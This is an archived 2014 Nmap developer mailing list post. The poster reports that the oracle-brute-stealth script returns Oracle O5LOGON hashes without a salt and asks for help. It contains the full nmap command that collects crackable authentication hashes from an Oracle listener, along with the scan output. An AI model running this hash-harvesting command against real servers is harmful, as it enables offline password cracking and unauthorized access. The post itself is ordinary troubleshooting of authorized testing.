Nmap Development mailing list archives
oracle-brute-stealth script hash but no salt
From: "Milliron, Brian" <B3MR () pge com>
Date: Wed, 16 Jul 2014 00:13:20 +0000
I'm using the oracle-brute-stealth script against an Oracle server my vuln scanners have identified as vulnerable to this exploit. I get the expected hashes in response, but without the salt. Is it possible there is no salt? Some information is missing maybe? Am I missing some support library? Is the TNS session getting mangled? Hopefully someone here can shed some light on the situation. nmap -p 1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=ORCL,oracle-brute-stealth.johnfile=o5logon.john 1.2.3.4 Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-15 16:39 PDT Nmap scan report for myhost (1.2.3.4) Host is up (0.0013s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-brute-stealth: | Accounts | AASH:$o5logon$ A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2* - Hashed valid or invalid credentials PG&E is committed to protecting our customers' privacy. To learn more, please visit http://www.pge.com/about/company/privacy/customer/ _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- oracle-brute-stealth script hash but no salt Milliron, Brian (Jul 19)